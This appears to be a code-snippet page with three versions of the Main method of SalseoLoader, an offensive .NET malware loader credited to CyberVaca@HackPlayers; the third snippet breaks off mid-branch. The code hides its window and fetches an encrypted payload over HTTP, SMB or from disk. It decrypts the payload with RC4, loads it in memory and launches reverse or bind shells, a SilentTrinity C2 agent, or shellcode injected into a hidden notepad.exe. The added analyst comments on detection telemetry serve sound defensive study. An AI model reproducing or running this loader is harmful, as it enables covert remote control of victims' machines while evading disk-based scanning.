Beispiel #1
        /// <summary>
        /// Loader entry point. Hides the console window, prints the banner, validates the
        /// command line, reads an encrypted payload from a location starting with "http",
        /// a UNC path or a local file, decodes and RC4-decrypts it with the key taken from
        /// args[0], loads the result as a .NET assembly from a byte array and invokes, via
        /// reflection, the method named after the requested shell type on the first type
        /// of that assembly.
        /// </summary>
        /// <param name="args">
        /// args[0] = decryption password, args[1] = payload location, args[2] = shell type
        /// (compared case-insensitively), args[3] = LHOST, args[4] = LPORT or DNS server
        /// for the modes that read it.
        /// </param>
        /// <remarks>
        /// Analyst notes: the password and the payload location are both passed on the
        /// command line, so process-creation logging with command-line capture records
        /// them. The decrypted assembly is handed to Assembly.Load(byte[]) and is not
        /// written to disk by the code shown here, so file-based scanning of the loader
        /// alone does not see it; assembly-load telemetry (the .NET runtime ETW provider,
        /// and AMSI on .NET Framework 4.8 and later) is where the decrypted bytes become
        /// visible.
        /// </remarks>
        static void Main(string[] args)
        {
            // Handle of this process's main window.
            IntPtr h = Process.GetCurrentProcess().MainWindowHandle;

            // ShowWindow is declared elsewhere in the file (presumably the user32 P/Invoke);
            // in that API an nCmdShow of 0 is SW_HIDE, so the window is hidden before any output.
            ShowWindow(h, 0);
            string banner = @"
  _____  ____  _     _____   ___   ___    
 / ___/ /    || |   / ___/  /  _] /   \   
(   \_ |  o  || |  (   \_  /  [_ |     |  
 \__  ||     || |___\__  ||    _]|  O  |  
 /  \ ||  _  ||     /  \ ||   [_ |     |  
 \    ||  |  ||     \    ||     ||     |  
  \___||__|__||_____|\___||_____| \___/   
                                          
 _       ___    ____  ___      ___  ____  
| |     /   \  /    ||   \    /  _]|    \ 
| |    |     ||  o  ||    \  /  [_ |  D  )
| |___ |  O  ||     ||  D  ||    _]|    / 
|     ||     ||  _  ||     ||   [_ |    \ 
|     ||     ||  |  ||     ||     ||  .  \
|_____| \___/ |__|__||_____||_____||__|\_|

";

            Console.ForegroundColor = ConsoleColor.Green;
            Console.Write(banner);
            Console.ForegroundColor = ConsoleColor.White;
            Console.WriteLine("                             By: CyberVaca@HackPlayers");

            // With three or fewer arguments only the usage text is printed and the process exits with code 1.
            if (args.Length <= 3)
            {
                // Ayuda();
                Console.ForegroundColor = ConsoleColor.Gray;
                Console.WriteLine("[+] Usage:\n");
                Console.WriteLine("    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT");
                Console.WriteLine("    [-] SalseoLoader.exe password \\\\smbserver.com\\evil\\elfuckingmal.txt ReverseUDP LHOST LPORT");
                Console.WriteLine("    [-] SalseoLoader.exe password c:\\temp\\elfuckingmal.txt ReverseICMP LHOST");
                Console.WriteLine("    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS");
                Console.WriteLine("    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT");
                Console.WriteLine("\n[+] Shells availables:\n\n    [-] ReverseTCP\n    [-] ReverseUDP\n    [-] ReverseDNS\n    [-] ReverseICMP\n    [-] BindTCP\n");
                System.Environment.Exit(1);
            }



            //################### Loader parameters and validation of the supplied arguments ###################
            string Salseo_Encriptado = null;
            string clave             = args[0].ToString();

            // The RC4 key is the ASCII encoding of the password given as args[0].
            byte[] xKey       = Encoding.ASCII.GetBytes(clave);
            string Salseo_URL = args[1].ToString();
            // Shell type is lower-cased so the comparisons below are case-insensitive.
            string funcion    = args[2].ToString().ToLower();

            // Per-mode argument-count checks; each failure prints a message and exits with code 1.
            // No separate count check for "bindtcp" appears in this method.
            if (funcion == "reversetcp")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
                }
            }
            if (funcion == "reverseudp")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
                }
            }
            if (funcion == "reversedns")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un nombre de dominio :("); Environment.Exit(1);
                }
            }
            if (funcion == "reverseicmp")
            {
                // Cannot be true here: three or fewer arguments already exited above.
                if (args.Length < 4)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
                }
            }
            // Reject any shell type outside the five supported names ('&' on bools evaluates every operand).
            if (funcion != "reversetcp" & funcion != "reversedns" & funcion != "reverseicmp" & funcion != "reverseudp" & funcion != "bindtcp")
            {
                Console.WriteLine("\n[-] Error en el tipo de shell :("); Environment.Exit(1);
            }
            Console.ForegroundColor = ConsoleColor.Gray;
            // Payload source is chosen from the prefix of args[1]: "http" -> ClienteWeb helper,
            // "\\" -> UNC path, anything else -> local path. The helpers are defined elsewhere.
            if (args[1].ToString().Substring(0, 4).ToLower() == "http")
            {
                Salseo_Encriptado = ClienteWeb.LeePayload(args[1].ToString());
            }
            if (args[1].ToString().Substring(0, 2).ToLower() == "\\\\")
            {
                Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
            }
            if (args[1].ToString().Substring(0, 4).ToLower() != "http" && args[1].ToString().Substring(0, 2).ToLower() != "\\\\")
            {
                Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
            }
            //#############################################################
            //####################### Loading the DLL ########################
            //#############################################################

            // Decoding chain: Zipea.Descomprime -> hex string -> bytes -> RC4.Decrypt with xKey.
            // All three helpers are defined elsewhere; presumably decompression, hex decoding and RC4.
            string hexadecimal = Zipea.Descomprime(Salseo_Encriptado);

            byte[] Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal);
            byte[] Final_Payload            = RC4.Decrypt(xKey, Final_Payload_encriptado);
            string clases = null;

            Console.WriteLine("[+] Desencriptando el salseo.");
            // The decrypted bytes are loaded as an assembly straight from memory.
            Assembly salsongo = Assembly.Load(Final_Payload);

            Console.WriteLine("[+] Cargando la salsa en memoria.");
            Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name);
            // Leaves the name of the last enumerated type in 'clases'; the value is only
            // referenced by the commented-out line below.
            foreach (Type infoass in salsongo.GetTypes())
            {
                var strclase = string.Format("{0}", infoass.Name); clases = strclase;
            }
            ;
            //Console.WriteLine("[+] Class de Assembly : " + clases);
            //######################## Foreach over the methods ####################
            //#####################################################################
            Console.WriteLine("[+] Version: " + salsongo.GetName().Version.ToString());
            Console.ForegroundColor = ConsoleColor.White;
            //#############################################################

            //########################### Call to the reverse-shell function ########################
            // Every branch below follows the same pattern: build a one-element string[] holding the
            // space-joined parameters, take the first type of the loaded assembly, look up the method
            // named after the shell type, create an instance and invoke the method with that array.
            if (funcion == "reversetcp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversetcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseudp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseudp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reversedns")
            {
                string     LHOST      = args[3].ToString();
                string     DNSServer  = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + DNSServer };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversedns");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseicmp")
            {
                // Only LHOST is passed for this mode (with a trailing space).
                string     LHOST      = args[3].ToString();
                string[]   argumentos = new string[] { LHOST + " " };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseicmp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "bindtcp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("bindtcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
        }
Beispiel #2
        /// <summary>
        /// Loader entry point (banner marks this variant "2.0"). Hides the console window,
        /// validates the command line, reads an encrypted payload from a location starting
        /// with "http", a UNC path or a local file, decodes and RC4-decrypts it with the key
        /// taken from args[0], and then either loads it as a .NET assembly from memory and
        /// invokes a method on its first type via reflection, or, in "shellcode" mode,
        /// passes the decrypted bytes and a process id to SalsaInjector.CodeInject.
        /// </summary>
        /// <param name="args">
        /// args[0] = decryption password, args[1] = payload location, args[2] = payload type
        /// (compared case-insensitively); args[3] and args[4] depend on the type (LHOST,
        /// LPORT, DNS server, target PID or C2 URL).
        /// </param>
        /// <remarks>
        /// Analyst notes: the password and payload location are on the command line, so
        /// process-creation logging with command-line capture records them. In assembly
        /// modes the decrypted bytes go to Assembly.Load(byte[]) and are not written to disk
        /// by the code shown here. In shellcode mode without a PID the method starts a
        /// hidden notepad.exe and uses it as the target, so a windowless notepad.exe whose
        /// parent is this process, followed by cross-process access from that parent, is the
        /// observable pattern (process-creation and process-access telemetry).
        /// </remarks>
        static void Main(string[] args)
        {
            // Handle of this process's main window.
            IntPtr h = Process.GetCurrentProcess().MainWindowHandle;

            // ShowWindow is declared elsewhere in the file (presumably the user32 P/Invoke);
            // in that API an nCmdShow of 0 is SW_HIDE, so the window is hidden before any output.
            ShowWindow(h, 0);
            string banner = @"
  _____  ____  _     _____   ___   ___    
 / ___/ /    || |   / ___/  /  _] /   \   
(   \_ |  o  || |  (   \_  /  [_ |     |  
 \__  ||     || |___\__  ||    _]|  O  |  
 /  \ ||  _  ||     /  \ ||   [_ |     |  
 \    ||  |  ||     \    ||     ||     |  
  \___||__|__||_____|\___||_____| \___/   
                                          
 _       ___    ____  ___      ___  ____  
| |     /   \  /    ||   \    /  _]|    \ 
| |    |     ||  o  ||    \  /  [_ |  D  )
| |___ |  O  ||     ||  D  ||    _]|    / 
|     ||     ||  _  ||     ||   [_ |    \ 
|     ||     ||  |  ||     ||     ||  .  \
|_____| \___/ |__|__||_____||_____||__|\_|    2.0

";

            Console.ForegroundColor = ConsoleColor.Green;
            Console.Write(banner);
            Console.ForegroundColor = ConsoleColor.White;
            Console.WriteLine("                             By: CyberVaca@HackPlayers");

            // With two or fewer arguments only the usage text is printed and the process exits with code 1.
            if (args.Length <= 2)
            {
                string ayuda = @"
[+] Usage:

    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
    [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
    [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
    [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode PID
    [-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C
    
[+] Available Payloads:

    [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL  [-] Shellcode
    [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP     [-] SilentTrinity

";
                // Ayuda();
                Console.ForegroundColor = ConsoleColor.Gray;
                Console.WriteLine(ayuda);
                System.Environment.Exit(1);
            }



            //################### Loader parameters and validation of the supplied arguments ###################
            string Salseo_Encriptado = null;
            string clave             = args[0].ToString();

            // The RC4 key is the ASCII encoding of the password given as args[0].
            byte[] xKey       = Encoding.ASCII.GetBytes(clave);
            string Salseo_URL = args[1].ToString();
            // Payload type is lower-cased so the comparisons below are case-insensitive.
            string funcion    = args[2].ToString().ToLower();

            // Per-mode argument-count checks; each failure exits with code 1, some without a message.
            // No separate count check for "bindtcp" appears in this method.
            if (funcion == "reversetcp" || funcion == "reversessl")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
                }
            }
            if (funcion == "reverseudp")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
                }
            }
            if (funcion == "reversedns")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un nombre de dominio :("); Environment.Exit(1);
                }
            }
            if (funcion == "reverseicmp")
            {
                if (args.Length < 4)
                {
                    Environment.Exit(1);
                }
            }
            if (funcion == "shellcode")
            {
                // Cannot be true here: two or fewer arguments already exited above.
                if (args.Length < 2)
                {
                    Environment.Exit(1);
                }
            }
            // Reject any payload type outside the eight supported names ('&' on bools evaluates every operand).
            if (funcion != "reversetcp" & funcion != "reversedns" & funcion != "reverseicmp" & funcion != "reverseudp" & funcion != "bindtcp" & funcion != "reversessl" & funcion != "shellcode" & funcion != "silenttrinity")
            {
                Console.WriteLine("\n[-] Error en el tipo de shell :("); Environment.Exit(1);
            }
            if (funcion == "silenttrinity")
            {
                // Cannot be true here either; the silenttrinity branch further down reads args[3].
                if (args.Length < 3)
                {
                    Environment.Exit(1);
                }
            }
            Console.ForegroundColor = ConsoleColor.Gray;
            // Payload source is chosen from the prefix of args[1]: "http" -> ClienteWeb helper,
            // "\\" -> UNC path, anything else -> local path. The helpers are defined elsewhere.
            if (args[1].ToString().Substring(0, 4).ToLower() == "http")
            {
                Salseo_Encriptado = ClienteWeb.LeePayload(args[1].ToString());
            }
            if (args[1].ToString().Substring(0, 2).ToLower() == "\\\\")
            {
                Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
            }
            if (args[1].ToString().Substring(0, 4).ToLower() != "http" && args[1].ToString().Substring(0, 2).ToLower() != "\\\\")
            {
                Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
            }
            //#############################################################
            //####################### Loading the DLL ########################
            //#############################################################

            // Decoding chain: Zipea.Descomprime -> hex string -> bytes -> RC4.Decrypt with xKey.
            // All three helpers are defined elsewhere; presumably decompression, hex decoding and RC4.
            string hexadecimal = Zipea.Descomprime(Salseo_Encriptado);

            byte[]   Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal);
            byte[]   Final_Payload            = RC4.Decrypt(xKey, Final_Payload_encriptado);
            string   clases   = null;
            Assembly salsongo = null;

            // Every mode except "shellcode" treats the decrypted bytes as a .NET assembly
            // and loads it straight from memory.
            if (funcion != "shellcode")
            {
                salsongo = Assembly.Load(Final_Payload);
                Console.WriteLine("[+] Cargando la salsa en memoria.");
                Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name);
                // Leaves the name of the last enumerated type in 'clases'; the value is not
                // read again in this method.
                foreach (Type infoass in salsongo.GetTypes())
                {
                    var strclase = string.Format("{0}", infoass.Name); clases = strclase;
                }
                ;
                //######################## Foreach over the methods ####################
                //#####################################################################
                //Console.WriteLine("[+] Version: " + salsongo.GetName().Version.ToString());
                //Console.ForegroundColor = ConsoleColor.White;
                //#############################################################
            }

            //########################### Call to the SilentTrinity function ########################
            // Every assembly branch below follows the same pattern: build a one-element string[]
            // with the mode's parameters, take the first type of the loaded assembly, look up the
            // method by name, create an instance and invoke the method with that array.
            if (funcion == "silenttrinity")
            {
                // This mode calls a method named "lanza" and passes args[3] unchanged.
                string     URLSILENT  = args[3].ToString();
                string[]   argumentos = new string[] { URLSILENT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("lanza");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            //########################### Call to the reverse-shell function ########################
            if (funcion == "reversetcp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversetcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reversessl")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversessl");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseudp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseudp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reversedns")
            {
                string     LHOST      = args[3].ToString();
                string     DNSServer  = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + DNSServer };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversedns");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseicmp")
            {
                // Only LHOST is passed for this mode (with a trailing space).
                string     LHOST      = args[3].ToString();
                string[]   argumentos = new string[] { LHOST + " " };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseicmp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "bindtcp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("bindtcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            // Shellcode mode: the decrypted bytes are not loaded as an assembly but handed to
            // SalsaInjector.CodeInject together with a process id. CodeInject is defined elsewhere;
            // presumably it writes and runs the buffer in that process (implementation not shown).
            // Argument counts other than 3 or 4 fall through both branches and do nothing.
            if (funcion == "shellcode")
            {
                byte[] sc = Final_Payload;
                if (args.Length == 4)
                {
                    // Target is an existing process whose PID is parsed from args[3].
                    int pid = System.Convert.ToInt32(args[3].ToString());
                    SalsaInjector.CodeInject(pid, sc);
                }
                if (args.Length == 3)
                {
                    // No PID given: start notepad.exe from a hard-coded path with a hidden
                    // window and use the new process as the target.
                    Process proc = new Process();
                    Console.WriteLine("[+] Spawneando proceso notepad.exe");
                    proc.StartInfo.FileName    = "C:\\WINDOWS\\SYSTEM32\\NOTEPAD.EXE";
                    proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
                    proc.Start();
                    int pid = proc.Id;
                    Console.WriteLine("[+] Proceso con pid " + pid);
                    SalsaInjector.CodeInject(pid, sc);
                }
            }
        }
Beispiel #3
        /// <summary>
        /// Loader entry point. Hides the console window, validates the command line, reads
        /// an encrypted payload from a location starting with "http", a UNC path or a local
        /// file, decodes and RC4-decrypts it with the key taken from args[0], and then either
        /// loads it as a .NET assembly from memory and invokes a method on its first type via
        /// reflection, or, in "shellcode" mode, copies the decrypted bytes into executable
        /// memory of the current process and calls them through a delegate.
        /// </summary>
        /// <param name="args">
        /// args[0] = decryption password, args[1] = payload location, args[2] = payload type
        /// (compared case-insensitively); args[3] and args[4] depend on the type (LHOST,
        /// LPORT, DNS server or C2 URL).
        /// </param>
        /// <remarks>
        /// Analyst notes: the password and payload location are on the command line, so
        /// process-creation logging with command-line capture records them. In assembly
        /// modes the decrypted bytes go to Assembly.Load(byte[]) and are not written to disk
        /// by the code shown here. In shellcode mode the code requests a region with
        /// EXECUTE_READWRITE protection and runs from it; a private, committed RWX region
        /// that is not backed by a module image is a standard indicator for memory scanners.
        /// </remarks>
        static void Main(string[] args)
        {
            // Handle of this process's main window.
            IntPtr h = Process.GetCurrentProcess().MainWindowHandle;

            // ShowWindow is declared elsewhere in the file (presumably the user32 P/Invoke);
            // in that API an nCmdShow of 0 is SW_HIDE, so the window is hidden before any output.
            ShowWindow(h, 0);
            string banner = @"
  _____  ____  _     _____   ___   ___    
 / ___/ /    || |   / ___/  /  _] /   \   
(   \_ |  o  || |  (   \_  /  [_ |     |  
 \__  ||     || |___\__  ||    _]|  O  |  
 /  \ ||  _  ||     /  \ ||   [_ |     |  
 \    ||  |  ||     \    ||     ||     |  
  \___||__|__||_____|\___||_____| \___/   
                                          
 _       ___    ____  ___      ___  ____  
| |     /   \  /    ||   \    /  _]|    \ 
| |    |     ||  o  ||    \  /  [_ |  D  )
| |___ |  O  ||     ||  D  ||    _]|    / 
|     ||     ||  _  ||     ||   [_ |    \ 
|     ||     ||  |  ||     ||     ||  .  \
|_____| \___/ |__|__||_____||_____||__|\_|

";

            Console.ForegroundColor = ConsoleColor.Green;
            Console.Write(banner);
            Console.ForegroundColor = ConsoleColor.White;
            Console.WriteLine("                             By: CyberVaca@HackPlayers");

            // With two or fewer arguments only the usage text is printed and the process exits with code 1.
            if (args.Length <= 2)
            {
                string ayuda = @"
[+] Usage:

    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
    [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
    [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
    [-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C
    
[+] Available Payloads:

    [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL  [-] Shellcode
    [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP     [-] SilentTrinity

";
                // Ayuda();
                Console.ForegroundColor = ConsoleColor.Gray;
                Console.WriteLine(ayuda);
                System.Environment.Exit(1);
            }



            //################### Loader parameters and validation of the supplied arguments ###################
            string Salseo_Encriptado = null;
            string clave             = args[0].ToString();

            // The RC4 key is the ASCII encoding of the password given as args[0].
            byte[] xKey       = Encoding.ASCII.GetBytes(clave);
            string Salseo_URL = args[1].ToString();
            // Payload type is lower-cased so the comparisons below are case-insensitive.
            string funcion    = args[2].ToString().ToLower();

            // Per-mode argument-count checks; each failure exits with code 1, some without a message.
            // No separate count check for "bindtcp" appears in this method.
            if (funcion == "reversetcp" || funcion == "reversessl")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
                }
            }
            if (funcion == "reverseudp")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
                }
            }
            if (funcion == "reversedns")
            {
                if (args.Length < 5)
                {
                    Console.WriteLine("\n[-] Necesitas introducir un nombre de dominio :("); Environment.Exit(1);
                }
            }
            if (funcion == "reverseicmp")
            {
                if (args.Length < 4)
                {
                    Environment.Exit(1);
                }
            }
            if (funcion == "shellcode")
            {
                // Cannot be true here: two or fewer arguments already exited above.
                if (args.Length < 2)
                {
                    Environment.Exit(1);
                }
            }
            // Reject any payload type outside the eight supported names ('&' on bools evaluates every operand).
            if (funcion != "reversetcp" & funcion != "reversedns" & funcion != "reverseicmp" & funcion != "reverseudp" & funcion != "bindtcp" & funcion != "reversessl" & funcion != "shellcode" & funcion != "silenttrinity")
            {
                Console.WriteLine("\n[-] Error en el tipo de shell :("); Environment.Exit(1);
            }
            if (funcion == "silenttrinity")
            {
                // Cannot be true here either; the silenttrinity branch further down reads args[3].
                if (args.Length < 3)
                {
                    Environment.Exit(1);
                }
            }
            Console.ForegroundColor = ConsoleColor.Gray;
            // Payload source is chosen from the prefix of args[1]: "http" -> ClienteWeb helper,
            // "\\" -> UNC path, anything else -> local path. The helpers are defined elsewhere.
            if (args[1].ToString().Substring(0, 4).ToLower() == "http")
            {
                Salseo_Encriptado = ClienteWeb.LeePayload(args[1].ToString());
            }
            if (args[1].ToString().Substring(0, 2).ToLower() == "\\\\")
            {
                Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
            }
            if (args[1].ToString().Substring(0, 4).ToLower() != "http" && args[1].ToString().Substring(0, 2).ToLower() != "\\\\")
            {
                Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false)
                {
                    Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
                }
                Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
            }
            //#############################################################
            //####################### Loading the DLL ########################
            //#############################################################

            // Decoding chain: Zipea.Descomprime -> hex string -> bytes -> RC4.Decrypt with xKey.
            // All three helpers are defined elsewhere; presumably decompression, hex decoding and RC4.
            string hexadecimal = Zipea.Descomprime(Salseo_Encriptado);

            byte[]   Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal);
            byte[]   Final_Payload            = RC4.Decrypt(xKey, Final_Payload_encriptado);
            string   clases   = null;
            Assembly salsongo = null;

            // Every mode except "shellcode" treats the decrypted bytes as a .NET assembly
            // and loads it straight from memory.
            if (funcion != "shellcode")
            {
                salsongo = Assembly.Load(Final_Payload);
                Console.WriteLine("[+] Cargando la salsa en memoria.");
                Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name);
                // Leaves the name of the last enumerated type in 'clases'; the value is not
                // read again in this method.
                foreach (Type infoass in salsongo.GetTypes())
                {
                    var strclase = string.Format("{0}", infoass.Name); clases = strclase;
                }
                ;
                //######################## Foreach over the methods ####################
                //#####################################################################
                //Console.WriteLine("[+] Version: " + salsongo.GetName().Version.ToString());
                //Console.ForegroundColor = ConsoleColor.White;
                //#############################################################
            }

            //########################### Call to the SilentTrinity function ########################
            // Every assembly branch below follows the same pattern: build a one-element string[]
            // with the mode's parameters, take the first type of the loaded assembly, look up the
            // method by name, create an instance and invoke the method with that array.
            if (funcion == "silenttrinity")
            {
                // This mode calls a method named "lanza" and passes args[3] with a trailing space.
                string     URLSILENT  = args[3].ToString();
                string[]   argumentos = new string[] { URLSILENT + " " };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("lanza");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            //########################### Call to the reverse-shell function ########################
            if (funcion == "reversetcp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversetcp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reversessl")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversessl");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseudp")
            {
                string     LHOST      = args[3].ToString();
                string     LPORT      = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + LPORT };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reverseudp");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reversedns")
            {
                string     LHOST      = args[3].ToString();
                string     DNSServer  = args[4].ToString();
                string[]   argumentos = new string[] { LHOST + " " + DNSServer };
                Type       myType     = salsongo.GetTypes()[0];
                MethodInfo Method     = myType.GetMethod("reversedns");
                object     myInstance = Activator.CreateInstance(myType);
                Method.Invoke(myInstance, new object[] { argumentos });
            }
            if (funcion == "reverseicmp")
